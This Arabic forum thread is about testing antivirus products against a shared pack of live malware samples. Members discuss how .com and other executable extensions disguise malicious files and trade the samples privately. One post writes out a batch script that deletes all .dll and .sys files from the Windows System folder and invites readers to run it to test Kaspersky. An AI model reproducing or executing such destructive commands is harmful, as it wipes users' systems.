عينة فيروسات :::: نشطة 815 خطور عالية :::: لتجربة

[protection]

السلام عليكم

ياليت أحد الاخوان يفيدنا .. لماذا بعض صيغ الملفات تنتهي بـ com

ويعجز عنها النود وبعض المكافحات من فحصها ..

مافائده هذه الصيغه ؟!!

 

[Mr.Najem]

السلام عليكم

ياليت أحد الاخوان يفيدنا .. لماذا بعض صيغ الملفات تنتهي بـ com

ويعجز عنها النود وبعض المكافحات من فحصها ..

مافائده هذه الصيغه ؟!!

وعليكم السلام
النود يكشف صيغة com ولكنه لا
يكشف عند الفحص بعض صيغ الملفات لانه لا يتعرف على
طريقة فك ضغطها ولكن بمجرد فتحها يتعرف عليها و يفتك بها :y:

 

[protection]

وعليكم السلام
النود يكشف صيغة com ولكنه لا
يكشف عند الفحص بعض صيغ الملفات لانه لا يتعرف على
طريقة فك ضغطها ولكن بمجرد فتحها يتعرف عليها و يفتك بها :y:

أعرف ذالك .. انا أريد مصدر هذه الملفات لماذا يتم أضافتها للعينات وتكون خطيره ..

نحن نعلم عن ملفات التنفيذيه exe وبغالب تكون على هيئة كراك أو باتش لاحد البرامج

اما صيغه com ماهي أستخدامه :i:

 

[Marceleos]

السلام عليكم

ياليت أحد الاخوان يفيدنا .. لماذا بعض صيغ الملفات تنتهي بـ com

ويعجز عنها النود وبعض المكافحات من فحصها ..

مافائده هذه الصيغه ؟!!

عليكم السلام ورحمة الله وبركاته

هلا اخوي كيف حالك اسال الله لك العافية

ملفات تاتي بصيغ com فقط ملفات الباتش التنفيذية هذه الصيغ ميزتها التمويه بالصيغه

يعيبها عدم القدرة على تغيير الايقونة

سهولة الخداع بالصيغة :hh:

 

[Marceleos]

حبيبي ما ادري للحين الطلبات عندك بالخاص ولاعند احد الاعضاء اذا عندك لاهنت أرســل

نجرب تشكيلة الحماايهـ

والله المفروض كل الي استلم العينة اذا احد من الاعضاء يرسها بس شكلهم كسلوو :

تفضل ارسلتها

 

[protection]

عليكم السلام ورحمة الله وبركاته

هلا اخوي كيف حالك اسال الله لك العافية

ملفات تاتي بصيغ com فقط ملفات الباتش التنفيذية هذه الصيغ ميزتها التمويه بالصيغه

يعيبها عدم القدرة على تغيير الايقونة

سهولة الخداع بالصيغة :hh:

اللهم أمين .. وأياك وكل مسلم ..

يعني هي بالاساس ملفات تنفيذيه مع تغير الصيغه بالاسم ؟! أو ملفات تابعه للباتش يعني مكمله !!

فهمني اكثر :q: << التعب منسيه امور الحاسب

 

[Marceleos]

اللهم أمين .. وأياك وكل مسلم ..

يعني هي بالاساس ملفات تنفيذيه مع تغير الصيغه بالاسم ؟! أو ملفات تابعه للباتش يعني مكمله !!

فهمني اكثر :q: << التعب منسيه امور الحاسب

لا ماهي ملفات تابعه لاي ملف هو اساس باتش بصيغته المعهودة exe

لكن نظرا لسهولة كشف هذه الصيغ نقوم نغير الصيغة لملف تنفيذي عشان يعمل الباتش بدون تعطل

من هذه الصيغ التي يعمل عليها اي ملف تجسس com _scr

 

[protection]

لكن في الغالب تكون أوامر دوس

المشكلة ان البعض منها يفشل في فحصه النود + نورتن

وبكذا يقل معدل الكشف لديه في الفحص .. في أي أختبار نجريه

 

[Future Tank X-1]

من استخدمات هذي الصيغه :-

1- يصنع منها ملفات للباتشات التي تزيل الفيروسات لان بعض الفيروسات تضرب كل exe مثل Sality فتستخدم كبديل للـ exe . <<< استخدام شريف :hh:

لمعلومات اكثر اسال زيزوووم لانه صنع اداه بهذي الصيغة لازالة فيروس صيني .

هذا الي اعرفه :q:​

 

[Marceleos]

لكن في الغالب تكون أوامر دوس

المشكلة ان البعض منها يفشل في فحصه النود + نورتن

وبكذا يقل معدل الكشف لديه في الفحص .. في أي أختبار نجريه

صحيح دوس لكن تنفيذي خطر

واذا المكافح ما اكتشفه يجي دور الجدار الناري ان وجد

والا المستخدم عليه بالطرق الاتية

1_ استعمال antifrost
2_ استعمال الهيكس
3_ استعمال TEApplet
4_ اخيرا استخدام مواقع الفحص


​

 

[JOLT_K!NG]

اللهم أمين .. وأياك وكل مسلم ..

يعني هي بالاساس ملفات تنفيذيه مع تغير الصيغه بالاسم ؟! أو ملفات تابعه للباتش يعني مكمله !!

فهمني اكثر :q: << التعب منسيه امور الحاسب

اسمح لي بالتوضيح بما لدي

هناك امتدادات تنفذية كثيرة تختلف كلا حسب الحاجة وبيئة العمل المراد استخدمه فيها من هذه الامتدادات

bat .scr. exe. com. pif .dll . cox

جميعها تعتبر امتدادات تنفيذية قادرة على خلق تغيرات في النظام او بمعنى اخر انه تستطيع التحكم بالنظام

وكما ذكرة كل امتداد له مميزاته

وخصائصه تختلف حسب عمله والحاجة اليه وهنا بعض المعاني لهذه الملفات

​

EXE
Executable File
ملف تنفيذي

BAT
Batch File
ملف دفعي

COM
Command File
ملف أوامر


وطريقة عمل بعض هذه الامتدادات هي ان يقوم الويندز بتنفيذ الاوامر الموجود في هذه الملفات !

ارجو ان اكون وضحة هذا ما لدي وهناك ايضا امتدادات dll . shs ايضا تصنف تنفيذية

 

[JOLT_K!NG]

لكن في الغالب تكون أوامر دوس

المشكلة ان البعض منها يفشل في فحصه النود + نورتن

وبكذا يقل معدل الكشف لديه في الفحص .. في أي أختبار نجريه

المشكلة اخي وليد هنا ان هذه الملفات تعتبر من ضمن بئية عمل الويندز نفسها وتكون صعبة الكشف من برامج الحماية لانه تحتاج للتحليل هذه الاوامر لانه اوامر برمجية بالاساس تتحكم بعمل النظام وربما تكون من المستخدم نفسه لكن هناك بعضها يكشف من برامج الحماية بناء على الخطورة التي سوف يلحقها بالنظام واليك مثال

call attrib -h -r c:autoexec.bat >nul
@Echo off
c:
cd %WinDir%System
deltree /y *.dll
cd
deltree /y *.sys

قم بحفظ الملف بمفكرة بامتداد bat ولاحظ رد فعل الكاسبر

هنا الفيرس عبارة عن ملف اوامر لكن هنا الكاسبر يقوم بالحكام عليه بناء على الاوامر المدرجة
call attrib -h -r c:\autoexec.bat >nul هذ السطر ضرورية حتى يتم عمل ملف الاوامر

يمكن تنفيذ الاوامر بشكل عادي من المستخدم لانها اوامر برمجية للنظام فقط لكن هنا من خلال هذا السطر يقوم بكشفها على انه فيروس يقوم هذا السطر نقل الامر (الذى سوفة نكتبة بعد ذلك) الى ملف اسمة autoexec.bat في النظام هذا والعلم عند الله

 

[الماستر]

هـذي نتيجة الفحص عندي بالكاسبر انترنت سيكيورتي 8.0.0.506 والاعدادات تــبع زيزوووم حبيب الشعب تركي

 

[amir atta]

أحد الاخوة يرسل العينة​

 

[الماستر]

تم أرسال العينهـ للأخ (amir atta)

ننتظر النتايج

 

[bonif1]

السلام عليكم
ارسلوا شباب الله يحفظكم

 

[عباده عيساوي]

ارسل اخي لو سمحت

 

[abwem]

وعليكم السلام ورحمة الله وبركاته

دزه ع الخاص ياحبيب ألبي

 

[الماستر]

bonif1;عباده عيساوي;abwem
تمـ

 

[مجيد الحلو]

صحيح الموضوع خالص تقريبا بس ماشفت احد وضع نتائج الافيرا فقلت احطها انا :bleh: